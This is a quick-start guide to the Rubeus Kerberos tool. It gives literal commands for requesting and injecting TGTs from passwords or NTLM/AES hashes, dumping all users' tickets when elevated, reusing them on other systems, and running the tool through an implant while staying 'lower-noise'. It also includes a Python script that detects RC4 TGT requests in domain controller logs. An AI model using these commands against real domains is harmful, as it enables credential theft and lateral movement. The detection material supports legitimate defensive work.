Rubeus is a Windows command-line executable that communicates directly with Active Directory domain controllers over Kerberos port 88. This guide walks you through obtaining the binary, verifying it works, requesting your first TGT, and inspecting the tickets cached in your current logon session — all in a few minutes.

Prerequisites

Before you begin, confirm you have the following:
  • A Windows machine joined to an Active Directory domain (or network access to a domain controller)
  • .NET Framework 3.5 or 4.0 installed (present by default on most domain-joined Windows machines)
  • A valid domain user account and its password (or NTLM/AES hash)
  • Rubeus.exe obtained by compiling from source (see Building from Source) or from a trusted release

No elevated privileges are needed to request a TGT for your own account or to apply it to your current logon session. Operations such as dumping tickets for all users or applying tickets to another logon session do require elevation.

Steps

1. Display help

Run Rubeus.exe with no arguments to verify the binary works and display the full usage reference:

    Rubeus.exe

A successful run prints the Rubeus banner and the complete command list. If you see an error about a missing .NET runtime, install .NET Framework 4.0 from Windows Update or your enterprise software catalog.

2. Request a TGT with a password

Use asktgt to request a Ticket Granting Ticket from the KDC and inject it directly into your current logon session with /ptt:

    Rubeus.exe asktgt /user:jdoe /password:Password123 /domain:CORP.LOCAL /ptt

On success, Rubeus prints a base64-encoded .kirbi blob and confirms [+] Ticket successfully imported!. The TGT is now active in your logon session and will be used automatically for subsequent Kerberos authentications.

You can also authenticate using an NTLM (RC4) hash instead of a password:

    Rubeus.exe asktgt /user:jdoe /rc4:NTLMHASHHERE /domain:CORP.LOCAL /ptt

Or with an AES-256 key for a lower-noise exchange:

    Rubeus.exe asktgt /user:jdoe /aes256:AES256HASHHERE /domain:CORP.LOCAL /ptt

3. List current tickets

Use triage to display a summary table of all Kerberos tickets cached in your current logon session:

    Rubeus.exe triage

If you are running as an elevated process, triage lists tickets across all logon sessions on the host. The output shows the ticket owner, service name, encryption type, and expiry time at a glance.

4. Dump ticket data

Use dump to extract the full base64-encoded .kirbi blobs for all tickets in the current logon session:

    Rubeus.exe dump

When elevated, dump extracts tickets for every user on the system. The base64 output can be decoded back to a .kirbi file with:

    [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("aa..."))

You can then use that .kirbi with Rubeus.exe ptt /ticket:ticket.kirbi to import it on another system.
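
The asktgt step above calls the AES-256 variant a lower-noise exchange than the RC4 hash; on the domain controller that difference is visible in Security event 4768, whose TicketEncryptionType field records 0x17 for RC4-HMAC and 0x12 for AES-256. The following is an added example, not code from this page or from the Rubeus project: it scans exported 4768 events for issued RC4 TGTs. It assumes AES is the normal encryption type in the domain; the sample events, the account names and the allow parameter are constructed for illustration.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
RC4_HMAC = 0x17  # Kerberos etype 23; AES256-CTS-HMAC-SHA1-96 is 0x12

# Template for one Security event 4768 in exported-XML layout (subset of fields).
EVT = ('<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>'
       '<EventID>4768</EventID><TimeCreated SystemTime="{t}"/></System><EventData>'
       '<Data Name="TargetUserName">{u}</Data><Data Name="Status">{s}</Data>'
       '<Data Name="TicketEncryptionType">{e}</Data>'
       '<Data Name="IpAddress">{ip}</Data></EventData></Event>')

# Constructed sample (not real logs): RC4 success, AES success, RC4 from a
# legacy service account, and a failed request that issued no ticket.
ROWS = [
    ("2024-01-01T10:00:00Z", "jdoe", "0x0", "0x17", "::ffff:10.0.0.50"),
    ("2024-01-01T10:01:00Z", "asmith", "0x0", "0x12", "::ffff:10.0.0.51"),
    ("2024-01-01T10:02:00Z", "svc_legacy", "0x0", "0x17", "::ffff:10.0.0.9"),
    ("2024-01-01T10:03:00Z", "nosuchuser", "0x6", "0xffffffff", "::ffff:10.0.0.50"),
]
SAMPLE = "<Events>" + "".join(
    EVT.format(t=t, u=u, s=s, e=e, ip=ip) for t, u, s, e, ip in ROWS) + "</Events>"


def rc4_tgt_requests(xml_text, allow=frozenset()):
    """Return (time, account, source) for successful 4768 events with etype RC4-HMAC."""
    hits = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4768":
            continue
        data = {d.get("Name"): (d.text or "")
                for d in ev.findall("e:EventData/e:Data", NS)}
        try:
            etype = int(data.get("TicketEncryptionType", ""), 16)
            status = int(data.get("Status", ""), 16)
        except ValueError:
            continue  # malformed or missing fields: skip rather than guess
        user = data.get("TargetUserName", "")
        if status != 0 or etype != RC4_HMAC or user.lower() in allow:
            continue  # failed request, non-RC4 ticket, or known legacy account
        tc = ev.find("e:System/e:TimeCreated", NS)
        when = tc.get("SystemTime") if tc is not None else ""
        hits.append((when, user, data.get("IpAddress", "")))
    return hits


if __name__ == "__main__":
    for hit in rc4_tgt_requests(SAMPLE, allow={"svc_legacy"}):
        print(hit)
```

The allow set is where accounts that still legitimately negotiate RC4 belong; anything outside it that receives an RC4 TGT is worth correlating with the source address.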

Global Flags

These flags apply to nearly every Rubeus command and are worth knowing before exploring further:

| Flag | Description |
| --- | --- |
| /nowrap | Prevents base64 ticket blobs from being line-wrapped. Use this when piping output or saving blobs to pass between tools. |
| /debug | Outputs ASN.1 structure debugging information. Useful when diagnosing unexpected KDC responses. |
| /consoleoutfile:C:\path\out.txt | Redirects all console output (stdout and stderr) to the specified file. |

The /nowrap flag is especially important when copying a base64 ticket blob from the console to pass as a /ticket: argument to another command. Without it, the wrapped newlines will cause the base64 decode to fail.

Use /consoleoutfile:C:\Temp\rubeus.log when running Rubeus through an implant or remote shell that does not preserve console formatting. All output, including error messages, is written to the file, making it easy to review results asynchronously.
